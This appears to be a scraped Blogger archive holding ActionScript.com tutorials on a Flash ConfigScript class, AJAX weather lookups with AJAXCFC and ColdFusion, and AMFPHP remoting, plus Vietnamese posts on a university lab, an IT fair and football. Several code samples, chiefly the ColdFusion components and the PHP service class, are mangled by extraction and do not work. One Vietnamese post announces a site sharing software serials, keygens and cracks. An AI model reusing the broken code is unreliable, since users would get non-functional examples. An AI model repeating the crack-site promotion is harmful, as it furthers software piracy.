10px 0pt; float: left; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZEQw1WJNfrMlf6pIVofghodYmV_7GgQZ10laBnY3mMjj-LmIpL4VoYpC2D5VpNip08eVMK-IFRwygx_oPyv7-LMl79rfrVbxltryWEEr8CeK5XaWXI6w5ciBhTYbq5GgmXfSP/s320/lrg_Configure-Your-Applications-with-ConfigScript.jpg" alt="" id="BLOGGER_PHOTO_ID_5042427402057770354" border="0" /></a> We recently finished up a Flash application that was to be deployed on a CD ROM for distribution. The application was pretty simple (more art and animation than serious coding). But there were certain parts of the application that needed to be editable and configurable by the client without requiring the SWFs to be recompiled.<div id="article_box"><div><span id="dnn_ctr407_Article_lblArticleText"> <p>The client was a skilled Flash designer, familiar with basic ActionScript, but not looking to dig into XML config files or URL encoded strings to feed a LoadVars object just to change some basic configuration.</p> <p>I was thinking how it would be cool if the client could just use their existing ActionScript knowledge to create a simple configuration file that would live on the CD. Using an #include file, we could update data, but it would require a recompilation of the SWF. In this case, that wasn't an option. We needed a Configuration Script that would resemble ActionScript syntax and still be usable in a meaningful way within Flash at runtime. So, we made ConfigScript!</p> <p>The demonstration files used for this article are available <a href="http://www.actionscript.com/files/satori/ConfigScript.zip">here</a></p> <p>ConfigScript is a class that loads and parses text data that resembles ActionScript and provides a simple way for the Developer to retrieve and use those values. I made copious comments in the class, so I won't get into the deep aspects of the class here. Instead, I'll demonstrate its use and document its public API.</p> <p>ConfigScript uses <a href="http://www.actionscript.com/Article/tabid/54/ArticleID/Manage-Communications-with-EventDispatcher/Default.aspx">EventDispatcher</a> to manage events, so it automatically supports the methods dispatchEvent(), addEventListener(), removeEventListener(), and dispatchQueue(). In its current form, it supports the events "Data" (dispatched when the data has arrived and been parsed) and "HTTPStatus" (dispatched when an error or other status event occurs).</p> <p>Its other public functions are:</p> <h4>ConfigScript.load(uri:String):Void</h4> <p>This method takes in a URI (path to a text document) containing basic ActionScript syntax assigning values to variables of any name.</p> <h4>ConfigScript.getItemValue(id:String):Object</h4> <p>This method looks up the value of a ConfigScript variable based on the name of the variable in the ConfigScript file. Note, the variable names can also include dot syntax, so you can set a ConfigScript property of an object as in myImage._x = 100.</p> <h4>ConfigScript.getBytesLoaded():Number</h4> <p>This method returns the number of bytes currently loaded.</p> <h4>ConfigScript.getBytesTotal():Number</h4> <p>This method returns the number of bytes to be loaded.</p> <h4>Using ConfigScript</h4> <p>To create a ConfigScript file, just open a text editor, create a new text file and write out the configuration variables in normal ActionScript type syntax, as in:</p> </span><div style="text-align: center;"><span id="dnn_ctr407_Article_lblArticleText"><blockquote><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://photos1.blogger.com/blogger2/7640/730/1600/a1.0.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://photos1.blogger.com/blogger2/7640/730/320/a1.0.jpg" alt="" border="0" /></a><br /></blockquote></span><span id="dnn_ctr407_Article_lblArticleText"><blockquote> </blockquote></span></div><span id="dnn_ctr407_Article_lblArticleText"> <p>The above ConfigScript is intended to path an image that will be loaded dynamically in Flash and then position it on the stage. I saved this text file in the demo as "testConfig.cs".</p> <p>In Flash, we can open a new FLA, read the config file, then load and position the image with the following code:</p> </span><div style="text-align: center;"><span id="dnn_ctr407_Article_lblArticleText"><blockquote><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://photos1.blogger.com/blogger2/7640/730/1600/a2.0.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://photos1.blogger.com/blogger2/7640/730/320/a2.0.jpg" alt="" border="0" /></a><br /></blockquote></span><span id="dnn_ctr407_Article_lblArticleText"><blockquote> </blockquote></span></div><span id="dnn_ctr407_Article_lblArticleText"> <p>ConfigScript will read and parse the "testConfig.cs" file. Once the "Data" event tells you that it's ready, you can access all of the ConfigScript properties by name with the getItemValue method.</p> <p>It makes it a little awkward for the developer (who would probably prefer to just use XML), but it makes the process much easier for the designer who may only know simple ActionScript. Anyway, it worked great in our project. The client was happy that they could use their existing ActionScript skills to edit their application configuration, so I thought I'd release it here in case anyone else comes across the same problem.</p> <p>You can download the ConfigScript class (full of comments to explain what it's doing) along with a simple working demo <a href="http://www.actionscript.com/files/satori/ConfigScript.zip">here</a>.</p><p><span id="dnn_ctr407_ContentPane" align="left">By <a href="http://www.actionscript.com/Article/tabid/54/ArticleID/Configure-Your-Applications-with-ConfigScript/Default.aspx"><span id="dnn_ctr407_Article_lblAuthorName">Satori Canton</span></a><span id="dnn_ctr407_Article_lblAuthorName"> - ActionScript.Com</span><a href="http://www.actionscript.com/Article/tabid/54/ArticleID/Configure-Your-Applications-with-ConfigScript/Default.aspx"><span id="dnn_ctr407_Article_lblAuthorName"><br /></span></a></span></p></span></div></div>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-5987800.post-1158301814618218812006-09-15T08:30:00.000+02:002007-03-16T06:27:32.203+01:00AJAX - Getting to know the competition.<p> </p> <div id="article_box"><span id="articleImage"> <img id="dnn_ctr407_Article_imgArticle" src="http://www.actionscript.com/images/lrg_AJAX---Getting-to-know-the-competition-.jpg" alt="" border="0" /> </span> <div> <span id="dnn_ctr407_Article_lblArticleText">The buzz around AJAX is growing and if you haven't been asked about it by a client, you soon will. What is it and how AJAX affects the Flash community is a question that you need to ponder. As with anything knowledge is power, so let's take a look at AJAX and how one goes about utilizing it in a web application. AJAX is defined by Wikipedia as :<br />A Web development technique for creating interactive web applications. The intent is to make web pages feel more responsive by exchanging small amounts of data with the server behind the scenes, so that the entire Web page does not have to be reloaded each time the user makes a change.<br />AJAX utilizes the client Document Object model to fire events. These events call functions that interact with remote data and return that data to the browser. The client-side script handles the results from these functions and displays them on a web page. This is all accomplished without the need of a page refresh. <p class="style1"><strong>AJAX Pros</strong><br />a. Create more seamless and interactive user experience <br />b. Utilizes common scripting languages like Javascript<br />c. No plug-in required<br />d. Works on most browsers (see table)<br /></p> <table border="0" cellpadding="0" cellspacing="0" width="85%"> <tbody><tr> <td class="style1" valign="top"><p>Browsers that support Ajax</p> <p>(Note that this is a general list, and support of Ajax applications will depend on the features the browser supports.)</p> <p> * Microsoft Internet Explorer version 5.0 and above, and browsers based on it (Mac OS versions not supported)<br />* Gecko-based browsers like Mozilla, Mozilla Firefox, SeaMonkey, Epiphany (web browser), Galeon and Netscape version 7.1 and above<br />* Browsers implementing the KHTML API version 3.2 and above, including Konqueror version 3.2 and above, and Apple Safari version 1.2 and above<br /> * Opera browsers version 8.0 and above, including Opera Mobile Browser version 8.0 and above<br /> * iCab version 3.0b352 and above</p></td> <td class="style1"><br /></td> </tr> <tr> <td class="style1"><br /></td> <td class="style1"><br /></td> </tr> <tr> <td class="style1" valign="top"><p>Browsers that do not support Ajax</p> <p>This is a list of browsers that definitely do not support Ajax</p> <p> * Opera 7 and below<br /> * Microsoft Internet Explorer 4.0 and below<br /> * Text-based browsers like Lynx and Links<br /> * Browsers for the visually impaired (speech-synthesising, braille)<br /> * Browsers made before 1997</p> </td> <td class="style1"><br /></td> </tr> <tr> <td class="style1"><br /></td> <td class="style1"><br /></td> </tr> </tbody></table> <p class="style1"><br /><br /><strong>AJAX Cons</strong><br />a. Can break back button<br />b. Users need current browsers and Internet Explorer 6 can be a problem if users disable Javascript or Active X<br />c. Can adversely affect Accessibility<br />d. Javascript functions can become harder to maintain as pages become complex</p> <p class="style1"> </p> <p class="style1">For this article, I have chosen a ColdFusion AJAX implementation named AJAXCFC developed by Rob Gonda. AJAXCFC is an incredibly easy to use framework that handles all of the passing of data and method calls to and from ColdFusion and your web page. <a href="http://www.robgonda.com/blog/projects/ajaxcfc/" target="_blank">Download AJAXCFC here</a>.<br /><br /> Let's learn as we code by building a simple page that displays weather data returned from Weather.com.<br /></p> <p class="style1">Open your HTML editor and create a new page. Into the head of the document, paste the following two lines of code:</p> <p class="style1"> <textarea name="textarea" cols="50" rows="10" wrap="off"><script type="'text/javascript'">_ajaxConfig = {'_cfscriptLocation':'myweather.cfc', '_jsscriptFolder':'../js'};</script> <script type="'text/javascript'" src="'../js/ajax.js'"></script></textarea> </p> <p class="style1">These two lines of javascript are all that required to interact with AJAXCFC. The first line calls the _ajaxConfigfunction and passes several arguments relating to the location of your CFC file that you use to interact with the remote data. If you are familiar with Flash Remoting you will notice the similarity here with AJAX. In this example, we are calling a CFC named myWeather.cfc. This CFC will interact with the remote Weather.com XML document. The second line points to the another AJAXCFC file that is needed for the framework to be utilized on your page.</p> <p class="style1"> </p> <p class="style1">Now paste another Javascript function that will be fired when the user submits that form we will build shortly:</p> <p class="style1"> <textarea name="textarea2" cols="50" rows="10" wrap="off"><script type="text/javascript"> function doQuery(id) { // send data to CF DWRUtil.useLoadingMessage(); DWREngine._execute(_ajaxConfig._cfscriptLocation, null, 'doWeather', id, doQueryResults); } // call back function function doQueryResults (r) { $('location').innerHTML = r.location; $('humid').innerHTML = r.humidity; $('temp').innerHTML = r.temp; $('forcast').innerHTML = r.predip; resultsTable = $('resultsTable'); } </script></textarea> </p> <p class="style1"> </p> <p class="style1">This function is broken down into two parts the first, doQuery, uses the DWREngine._execute() - part of AJAXCFC - to call the doWeather function that is part of our myWeather.CFC. </p> <p class="style1">Similar to Flash Remoting, you then create a function - doQueryResults - to handle the results that are returned to the page by the doQuery function .<br />The key here are the lines:</p> <p class="style1"> $('id').innerHTML = r.id[0];<br />$('temp').innerHTML = r.temp[0];<br />$('humid').innerHTML = r.humid[0];<br />$('forcast').innerHTML = r.forcast[0] ;</p> <p class="style1">These define variables that are associated with areas of our webpage that will contain the dynamic data. The id attribute of the span tag tells the page which elements to update when results are returned. The code snippet below can be put anywhere on your page and these elements will update after each AJAX call.<br /><br /><span id="id"></span><br /><span id="temp"></span><br /><span id="humid"></span><br /><span id="forcast"></span><br /></p> <p class="style1">Next you need to create a form and make it fire the doQuery function once it is submitted:</p> <p class="style1">onSubmit="doQuery(myForm.arg.value);return false;"</p> <p class="style1"><br /><textarea name="textarea5" cols="50" rows="10" wrap="off"><form name="myForm" onsubmit="doQuery(myForm.arg.value);return false;"> <label>Enter Zip Code </label> <input name="arg" type="text" id="arg"> <input type="submit" value="Enter ID"><br /><br /> <label></label><span id="state"></span></form> </textarea> </p> <p class="style1">Notice that we are passing one argument to our CFC function doWeather; the zip code for which the user wishes to retrieve weather data.<br /><br />Next paste these lines below your form, again these lines specify the areas that will update once results are recieved from our call to the myWeather.cfc :<br /></p> <p class="style1"> <textarea name="textarea6" cols="50" rows="6" wrap="off"><span id="id"></span> <span id="temp"></span> <span id="humid"></span> <span id="forcast"></span></textarea> </p> <p class="style1">You are done with the client side. Now lets create our myWeather.CFC that will interact with theWeather.com XML.<br /><br />Weather.com provides free use of there data via XML feeds that are easily integrated into web projects. <a href="https://registration.weather.com/registration/xmloap/step1" target="_blank">Go here to sign up</a> as you will need a user key to for this example to work. Once you have your key you will be able to retrieve weather data for any zip code in the United States. The information is returned in XML format. <a href="http://rss.weather.com/weather/rss/local/29211?cm_ven=LWO&cm_cat=rss&par=LWO_rss" target="_blank">View example of XML</a>.<br /><br />If you look at the XML returned from Weather.com it can be a bit intimidating but here is a trick to make it less so. Create a new page and paste the following code:</p> <p class="style1"> </p> <p class="style1"> <textarea name="textarea3" cols="50" rows="15" wrap="off"><script type="text/javascript"> function getWeather() { <cfhttp url="http://xoap.weather.com/weather/local/29605?cc=*&dayf=2&amp;amp;amp;prod=xoap&par=1018472385&key=3b5f303e116b6a46" method="GET" resolveurl="No"></cfhttp> <cfset myxmldom =" XMLParse(cfhttp.fileContent)"> <cfset myitems =" XMLSearch(myXMLDom,"> <cfset myitemsc =" XMLSearch(myXMLDom,"> <cfset myvar =" 0"> <cfloop from="1" to="#arrayLen(myItems)#" index="i"> <cfset myvar =" myVar"> </cfloop> <cfoutput>#myVar#</cfoutput> <cfloop from="1" to="#arrayLen(myItemsC)#" index="i"> <cfoutput> #myItemsC[i].t.xmltext#</cfoutput><hr /> </cfloop> } </script> <cfdump var="#myXMLDoM#"> </textarea> </p> <p class="style1">What we are doing is using ColdFusion's XMLPARSE function to convert XML text into a XML document object that we can read and use.</p> <p class="style1">If you look at the output created by this code it is easy to see the nodes and their associated values. <a href="http://www.bizwerk.net/ajaxcfc/examples/zipcode/webservice_dump.cfm" target="_blank">View sample output.</a><br /><br />Now that we have a page that can read the remote XML, let's convert it to a CFC that we can utilize in our AJAX application.<br />Paste the following code into a new page:</p> <p class="style1"> <textarea name="textarea4" cols="50" rows="12" wrap="off"><cfcomponent extends="ajax"> <cffunction access="private" name="doWeather" output="no" returntype="struct"> <cfargument name="args" type="array" required="Yes" default="1"> <cfhttp url="http://xoap.weather.com/weather/local/#args[1]#?cc=*&dayf=2&amp;amp;amp;prod=xoap&par=1018472385&key=3b5f303e116b6a46" method="GET" resolveurl="No"></cfhttp> <cfset myxmldom =" XMLParse(cfhttp.fileContent)"> <cfset myitems =" XMLSearch(myXMLDom,"> <cfset myitemsc =" XMLSearch(myXMLDom,"> <cfset myloc =" XMLSearch(myXMLDom,"> <cfset myvar =" 0"> <cfset mytemp =" 0"> <cfset months="arraynew(1)"> <!-- --> <cfloop from="1" to="#arrayLen(myItems)#" index="i"> <cfset myvar =" myVar"> <cfset mytemp =" mytemp"> </cfloop> <cfloop from="1" to="#arrayLen(myItemsC)#" index="i"> <cfset> > </cfloop> <cfset results =" StructNew()"> <cfset location =" #myLoc[1].dnam.xmltext#"> <cfset humidity =" #myVar#"> <cfset temp =" #mytemp#"> <cfset predip =" #months#"> <cfreturn> </cffunction> </cfcomponent> </textarea><br /><br />I am not going to go through the whole CFC code but I do want to point out that we are returning multiple values from our<br />CFC and as such you need to use a return type of "struct" for our doWeather function. Also note the we need to place this line<br /><cfcomponent extends="ajax"> at the top of the page for AJAXCFC. The rest of the code simply finds the XML nodes that we wish to return and grabs their values - note nodes are treated as arrays and individual values are referenced as xmltext.<br /><br />Make sure all of your files are in the same directory and test your page. <a href="http://www.bizwerk.net/ajaxcfc/examples/zipcode/indexw.cfm" target="_blank">A working example can be viewed here</a> . Type a zip code into the form and see how the information updates without a page refresh. I know that this is not revolutionary, Flash has been enabling asynchronous data exchange for years, but is is a quantum leap from traditional transactional html forms and as such a lot of people are taking a look at AJAX. I for one don't see<br />AJAX as the ultimate answer or a threat to Flash. Just as Flash is not the ultimate answer, I tend to view AJAX as another tool and think it wise to learn as much about it as possible so that I am able to respond to client request.<br /><br />I hope that this article will enable you to look at AJAX more closely and see how it fits into your development toolbox. Is AJAX the magic bullet that will solve of your problems; probably not. But when you separate truth from hype I think that you will come to view AJAX a a powerful new tool that will complement your existing Flash skill set.</cfcomponent></p><p class="style1">(By: <span id="dnn_ctr407_Article_lblAuthorName"><a href="http://www.actionscript.com/Article/tabid/54/ArticleID/AJAX---Getting-to-know-the-competition-/Default.aspx">Chris Bizzell</a> - ActionScript.com)<br /></span></p></span></div></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5987800.post-1158299573264322802006-09-15T07:52:00.000+02:002007-03-16T06:25:41.893+01:00AMFPHP: Flash <–> PHP interaction<p> </p> <span id="articleImage"> </span><div style="text-align: left;"><span id="articleImage"><img id="dnn_ctr407_Article_imgArticle" src="http://www.actionscript.com/images/lrg_AMFPHP--Flash-----PHP-interaction.jpg" alt="" border="0" /> </span></div> <div> <span id="dnn_ctr407_Article_lblArticleText"><p>Any Flash developer who has worked on RIAs (Rich Internet Applications) that needed to interact with PHP knows that this isn’t a simple process at all. Although AMFPHP has been around for quite a while, I will start with a simple introduction and then build from there in coming articles.</p><br /><p>Before AMFPHP was available the only two options to send and load data from PHP were LoadVars and XML. If you wanted to query a database and return a complex data structure then your best option would have been XML since it was more suitable for structuring the data. But even with XML in order to retrieve data from a database you needed the logic that would do the actual query then additional logic that would parse the results of the query and build the xml string and finally parsing the xml on the client side in ActionScript to retrieve the data from the XML object.</p><br /><p>You may ask: "So, what’s wrong with that?".</p><br /><p>In a complex application debugging and maintenance will become pretty difficult if you have hundreds of PHP scripts just for the sole purpose of generating the xml strings, and several scripts on the client side to parse those xml objects and retrieve the necessary data. Not to mention the waste of time and resources needed to build something on the server side that you will automatically deconstruct on the client side.</p><br /><h2>Why is AMFPHP better?</h2><br /><p>Imagine writing a function on the server that queries the database and returns an array i.e. </p><br /><pre> return mysql_fetch_array(mysql_query("select * from table LIMIT 1")); </pre><br /><p>Then simply calling that function from ActionScript and getting an array with the results. No need to build XML strings on the server, no need to decode/parse data on the client side. If you send a number you will receive a number, if you send a string you will receive a string, if you send an array you will receive an array, even array keys are preserved. The data transfer is done in the binary AMF format rather then text format. The gateway and the ActionScript classes translate the data into this neutral format, thus allowing language specific data to be exchanged transparently.</p><br /><p>If you would like to know more about how AMFPHP works you can check out their official website at <a href="http://www.amfphp.org/">http://www.amfphp.org/</a></p><br /><h2>Hello World!</h2><br /><p>Let's get started by setting up a classic "Hello World!" example:</p><br /><p>First of all in order to use AMFPHP you will need to install the Adobe Remoting components for Action Script 2. You can download them from: <a href="http://www.adobe.com/products/flashremoting/downloads/components/">http://www.adobe.com/products/flashremoting/downloads/components/</a></p><br /><p>After installing the remoting components you will need to install AMFPHP. You can download the latest version from: <a href="http://www.amfphp.org/">http://www.amfphp.org/</a></p><br /><p>In order to install AMFPHP you will need a web server with PHP installed. You can choose between Apache, IIS, or other web servers. For the sake of simplicity I will assume that you are a Windows XP user and will install IIS.</p> <h2>Installing IIS on Windows XP:</h2> <p>Open your Control Panel:</p> <p>Click on "Add or Remove Programs";</p> <p>Click on "Add/Remove Windows Components";</p> <p>Check the box beside "Internet Information Services (IIS)" </p> <img src="http://www.actionscript.com/files/tibi/001%20AMFPHP%20Win%20Comp%20Wizard.gif" /> <p>Press the "Next" button.</p> <p>Your system will ask you to insert the windows installation CD, Insert the CD; press the "OK" button.</p> <p>And finally after the installation completes press the "Finish" button.</p> <h2>Installing PHP on Windows:</h2> <p>You can download PHP 5.1.4 as a windows installer from:</p> <a href="http://php.net/get/php-5.1.4-installer.exe/from/a/mirror">http://php.net/get/php-5.1.4-installer.exe/from/a/mirror</a> <p>This installer will automatically configure your IIS web server; you just need to follow the steps in the installer.</p> <p>When the installer prompts you for the installation type select "Standard".</p> <p>You can choose any directory to install PHP.</p> <p>You will need to select the version of IIS you installed; if you are a windows XP user your IIS version is 5.1.</p> <p>If you followed the steps correctly you should have a working web server and PHP installed on your PC. </p> <p>Let’s set up a test to see if the installations were successful:</p> <p>Create a new file with the name test.php, open it and add the following code:</p> <pre> </pre> <p>Save the file and copy it in your web server’s public directory (C:\Inetpub\wwwroot). Then open your favorite Browser and type the following in the address bar: <a href="http://localhost/test.php">http://localhost/test.php</a> (or click this link)</p> <p>If the output you get is similar to the following snapshot your web server and PHP are working properly.</p> <img src="http://www.actionscript.com/files/tibi/001%20AMFPHP%20PHP%20Version%20Screen.gif" /> <h2>Installing AMFPHP:</h2> <p>Once your web server and PHP are functional you can start installing AMFPHP. Unzip the contents of the zip archive in your web server’s public web directory (C:\Inetpub\wwwroot)</p> <p>If you check the contents of the amfphp folder you will notice a gatway.php file this is the gateway all AMFPHP requests will be routed through. You will also notice a services folder this is where your services will reside. A service is a PHP Class; each service will contain the methods you will be calling from ActionScript. If you keep the structure of the AMFPHP package unchanged no further configuration will be needed.</p> <p>I have created a Connector class that should make the use of AMFPHP easier. By using the connector even developers who didn’t use AS2 before will be able to use AMFPHP. The Connector can also be used with Java OPENAMF (which I will cover in another article), or JRun4.</p> <p>You can download the Connector class here: <a href="http://www.actionscript.com/files/tibi/Connector.zip">http://www.actionscript.com/files/tibi/Connector.zip</a></p> <p>Once you downloaded the zip file, create a new flash document and unzip the contents of the Connector.zip archive in the same folder where you flash document is. Add the following code to the first frame of your flash document:</p> <pre><br /><br />import com.actionscript.amfphp.Connector;<br /><br />var gatewayUrl:String="http://localhost/amfphp/gateway.php";<br />var con:Connector=new Connector(gatewayUrl);<br />con._PendingCall=con.setService('HelloWorld').say("Hello World from AMFPHP!");<br />con.setResponders(this.onResult, this.onFault, this);<br /><br />function onResult(data){<br />trace(data.result);<br />}<br />function onFault(status){<br />trace("error "+status.__fault);<br />}<br /><br /></pre> <p>The gatewayURL is the path to your gateway. I used localhost in this case but you can also use an IP address or domain. The parameter of the con.setService('HelloWorld').say("Hello World from AMFPHP!"); function is the name of the service in which your method is implemented; HelloWorld is the service we will create.</p> <p>After setting up the service you will call your method, in this case the method name is say con.setService('HelloWorld').say("Hello World from AMFPHP!");</p> <p>The say method we will implement pings back a message to flash, in this case the message is "Hello World from AMFPHP!"</p> <p>The onResult and onFault functions are the responders upon a successful AMFPHP call the onResult function will be called upon failure the onFault function will be called. You need to set the responder function in the Connector, in this example the responders are set by con.setResponders(this.onResult, this.onFault, this);</p> <p>You can give your responder functions any name as long as you pass those names correctly to the connector by using the setResponders function. Now that the client side logic is set up lets create our service.</p> <p>Create a new PHP file HelloWorld.php and put the following code in it:</p> <pre><br /><br />methodTable = array<br />(<br />"say" => array<br />(<br />"access" => "remote",<br />"description" => "Pings back a message"<br />)<br />);<br />}<br /><br />function say($sMessage)<br />{<br />return 'You said: ' . $sMessage;<br />}<br />}?><br /><br /></pre> <p>Note that the class name must be the same as the file name.</p> <p>If you aren’t familiar with OOP the first function in the php file is the constructor the name of this function must be the same as the class name.</p> <p>The constructor contains a methodTable array, all methods contained by the class must be defined here.</p> <p>And finally our say function, as you can see it simply returns the received parameter.</p> <p>Save your php file and copy it in the amfphp/services folder on your web server. (C:\Inetpub\wwwroot\amfphp\services)</p> <p>Now compile your Flash document, you should get a trace output with the following content: "You said: Hello World from AMFPHP!" (You should get the output instantly if the web server is running locally or in a couple of seconds if you are using a web host.)</p> <p>I hope this article was comprehensive and it helped in giving you a basic idea of what AMFPHP is capable of. In my next article I will explain how to create a simple text chat application with AMFPHP without the use of a database by using persistent PHP sessions.</p><br /><br /><br /><p>You can download a zip file containing all the files used in this "Hello World!" application here: <a href="http://www.actionscript.com/files/tibi/files.zip">http://www.actionscript.com/files/tibi/files.zip</a></p></span><span id="dnn_ctr407_ContentPane" align="left"><span id="dnn_ctr407_Article_lblAuthorName">(By: <a href="http://www.actionscript.com/Article/tabid/54/ArticleID/AMFPHP/Default.aspx">Tibor Gyorgy Ballai</a> - ActionScript.com)<br /></span></span></div>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-5987800.post-1145854935288688662006-04-24T07:02:00.000+02:002006-10-18T10:16:40.266+02:00Introduction of RDLAB<span style="font-size: 10pt; font-family: "Palatino Linotype";"><span style=""> </span></span><span style="font-size: 10pt;">Research and Development Laboratory (RDLAB) was setup in December 2005 in the Faculty of Electronics and Telecommunications, Hanoi University of Technology. The main <span class="GramE">missions of RDLAB is</span> to develop modern practical systems based on new technologies of ICT, especially multimedia and network technologies for Vietnamese economies.</span><br clear="all"><br> Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5987800.post-1126840266751621782005-09-16T05:07:00.000+02:002006-10-18T10:16:40.134+02:00Việt hoá Blog!Hôm nay ngày 16/9/2005,<br />Tất cả các bản blog của Duykham đều đã được Việt hoá hoản chỉnh.<br /><br />Mọi chi tiết xin liên hệ YM: <em>duykham2002</em>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5987800.post-1103944354200337712004-12-25T04:09:00.000+01:002006-10-18T10:16:40.003+02:00Khai trương site mớiHôm nay ngày 24/12/04, trang web Duykham chính thưc khai trương 2 site mới:
<br /> http://dkcracks.blogspot.com/
<br />Chia sẻ serial number, keygen, cracks,... của các phần mềm thông dụng.
<br /> http://dksoft.blogspot.com/
<br />Thông tin sản phẩm phần mềm.
<br />Rất mong được các bạn ủng hộ nhiệt tình!Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-5987800.post-1099740073528268292004-11-06T12:19:00.000+01:002006-10-18T10:16:39.892+02:00Ngày hội CNTT cho sinh viên Không đông đúc và ồn ã như một góc của Tuần lễ CNTT vừa diễn ra hồi trung tuần tháng 10 tại Hà Nội nhưng cũng đủ tấp nập để những người đến với ngày hội CNTT tại trường ĐH Bách Khoa ngày 24/10 cảm nhận đó là một ngày hội thực sự dành cho sinh viên.
<br />Giữa khuôn viên khu C1 - Trường Đại học Bách Khoa Hà Nội, các gian hàng nhỏ của Intel, Microsoft, FPT Software, CMC, Nokia... đã được dựng lên giữa không khí như thế và luôn đông nghẹt người chen chân ghé vào.
<br />Điều đặc biệt là không chỉ có “công dân” Bách khoa mới quan tâm đến ngày hội này mà còn hàng nghìn sinh viên các trường Đại học Kinh tế, Đại học Quốc Gia, Đại học Xây dựng cũng háo hức tham gia.
<br />Đến đây, sinh viên được tìm hiểu công nghệ máy tính mới nhất, truy cập Internet không dây tốc độ cao, tham gia các cuộc thi nhỏ như soạn nhạc, thiết kế tin nhắn đa phương tiện trên điện thoại di động, thi thuyết trình về tương lai CNTT, thi thiết kế thời trang bằng phần mềm trên máy vi tính, giao lưu với lãnh đạo một số công ty CNTT hàng đầu Việt Nam như FPT , CMC… Hàng trăm anh chàng “nghiền” IT đến “gian hàng” của Báo Tuổi trẻ (đơn vị đồng tổ chức với hãng Intel) để truy cập Internet không dây tốc độ cao từ những chiếc notebook đời mới, để click vào chuyên đề “Nhịp sống số” quen thuộc trên mỗi số báo Tuổi trẻ ra ngày thứ 2 hàng tuần. Dân “ngoại đạo” lại ghé vào đây để được tặng Tuổi trẻ Chủ nhật số mới nhất. Với nhiều người đã biết đến cuộc vận động “Vì nạn nhân chất độc màu da cam” do báo Tuổi trẻ phát động cách đây ít lâu thì để sẻ chia “Nỗi đau da cam” qua một số tấm ảnh và những bài báo được in trên tấm bạt khổ lớn.
<br />Buổi chiều ngày 24/10, cuộc giao lưu mang tên “Khởi nghiệp từ lúc còn là sinh viên” thu hút đông đảo sinh viên tham gia.
<br />Khách mời của chương trình là các giám đốc tuổi 20: Vương Vũ Thắng (TGĐ Cty Vinacomm), Kim Ngọc Minh (GĐ Cty TNHH Phát triển tài năng trẻ em T-Kid), Đào Lan Hương (PGĐ Cty phần mềm Hoà Bình). Trong cuộc trò chuyện, Đào Lan Hương đã nói về mơ ước và quyết tâm kinh doanh của mình. Cũng nói về khát khao được làm những gì mình thích, Vương Vũ Thắng lại nói đến tình yêu với CNTT từ khi còn là học sinh cấp ba với diễn đàn điện tử Trí tuệ Việt Nam Online (nay là Trái tim Việt Nam Online) mà Thắng và một nhóm bạn của mình đã lập ra. Thắng làm việc cho các công ty CNTT, kiếm tiền chỉ để “nuôi” mạng Trí tuệ Việt Nam. Khi ra trường và khởi nghiệp, Thắng đã có mấy năm kinh nghiệm.
<br />Còn Kim Ngọc Minh tâm sự: “Các bạn có hình dung được rằng mình khởi nghiệp với hai bàn tay trắng, tiền đăng ký kinh doanh cũng phải vay. Cái chính là lòng quyết tâm...”
<br />Dường như những gì mình và hai bạn trẻ chia sẻ vẫn chưa thoả “cơn khát” của các bạn sinh viên, vì thế, Hương đã chuyển lời cho anh Đỗ Hoài Nam – Giám đốc Trung tâm đào tạo Quản trị kinh doanh Thames - cùng giao lưu. Anh Hoài Nam chia sẻ với các bạn sinh viên: “ Hiện nay rất nhiều sinh viên giỏi về CNTT, một vài người tập hợp nhau lại để tự viết phần mềm hoặc gia công phần mềm rất tốt. Tuy nhiên, họ lại thiếu những tư duy và kỹ năng về Marketing. Một thí dụ đơn giản nhất là sản phẩm của bạn tốt nhưng bạn không biết cách quảng bá cũng ví như một bông hoa thơm nhưng nếu không nhờ những làn gió thì cũng chẳng ai biết đến mùi hương tuyệt vời đó. Và khi phát triển lên thành công ty thì lại gặp rất nhiều rắc rối trong cách điều hành, quản lý vì các bạn đang thiếu kỹ năng quản trị kinh doanh. Bên cạnh niềm đam mê CNTT (đây là yếu tố quyết định), nếu các bạn trang bị cho mình những tư duy kinh doanh, kỹ năng QTKD thì đó là hành trang tốt nhất giúp cho các bạn thực hiện những giấc mơ của mình; Và các bạn sẽ không chỉ dừng lại ở việc đi tìm được một chỗ làm tốt mà chính các bạn sẽ là những người tạo ra công ăn việc làm cho bản thân và các bạn sinh viên khác. Hãy nuôi dưỡng trong mình niềm đam mê cháy bỏng và những ước mơ lớn”
<br />Cũng chính vì lẽ đó mà Peacesoft đã trao 1 suất học bổng trị giá 600USD dưới hình thức tham gia khoá học miễn phí về quản trị doanh nghiệp tại Thames Business School cho 1 sinh viên xuất sắc nhất cuộc thi thuyết trình ý tưởng kinh doanh.
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5987800.post-1099193127317690662004-10-31T04:17:00.000+01:002006-10-18T10:16:39.827+02:00Delpiero hồi sinh!Trung phong của Juventus cho biết, anh đang từng bước tìm lại được phong độ đỉnh cao sau khi tiếp tục ghi bàn trong đêm qua (28/10).
<br />Đánh bại Roma <a href="http://thethao.vietnamnet.vn/bongda/seriea/2004/10/340138/">2-0</a> ở trận đấu trễ vòng 8, Juve duy trì khoảng cách 5 điểm so với đội xếp nhì AC Milan. Del Piero đóng góp 1 bàn trong chiến thắng ấy. Ba ngày trước đó, anh cũng đã sút thủng lưới Siena.
<br />Những bàn thắng trong tuần thực sự giải tỏa tâm lý cho Del Piero, vốn nhận không ít lời chỉ trích do lận đận với chấn thương gót chân dẫn đến giảm sút phong độ. Del Piero cho biết: ''Tôi vẫn chưa đạt được 100% phong độ nhưng mọi thứ trở nên tốt đẹp hơn rất nhiều. Cảm giác sau khi ghi bàn luôn thật thích thú và những bàn thắng trong thời gian này có ý nghĩa đặc biệt với tôi''.
